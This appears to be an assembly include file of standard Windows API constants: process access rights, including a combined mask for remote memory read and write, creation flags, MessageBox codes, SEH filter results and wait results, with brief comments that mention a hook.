PROCESS_VM_OPERATION = 8H
PROCESS_VM_READ = 10H
PROCESS_VM_WRITE = 20H
PROCESS_DUP_HANDLE = 40H
PROCESS_CREATE_PROCESS = 80H
PROCESS_SET_QUOTA = 100H
PROCESS_SET_INFORMATION = 200H
PROCESS_QUERY_INFORMATION = 400H
PROCESS_OPEN_ACCESS = PROCESS_VM_OPERATION OR PROCESS_VM_READ OR PROCESS_VM_WRITE   ; = 38H, the rights needed for remote memory read/write
ERROR_ALREADY_EXISTS = 183
CREATE_SUSPENDED = 4            ; CreateProcess creation flag
; MessageBox styles and return ids
MB_OK = 0
MB_OKCANCEL = 1
MB_ABORTRETRYIGNORE = 2
MB_YESNOCANCEL = 3
MB_YESNO = 4
MB_RETRYCANCEL = 5
IDOK = 1
IDCANCEL = 2
IDABORT = 3
IDRETRY = 4
IDIGNORE = 5
IDYES = 6
IDNO = 7
; SEH filter results
EXCEPTION_EXECUTE_HANDLER = 1
EXCEPTION_CONTINUE_SEARCH = 0
EXCEPTION_CONTINUE_EXECUTION = -1
; WaitForSingleObject results
WAIT_TIMEOUT = 0102H
WAIT_FAILED = 0FFFFFFFFH
WAIT_OBJECT_0 = 0
EVENT_MODIFY_STATE = 2          ; access right requested by OpenEventA in the hook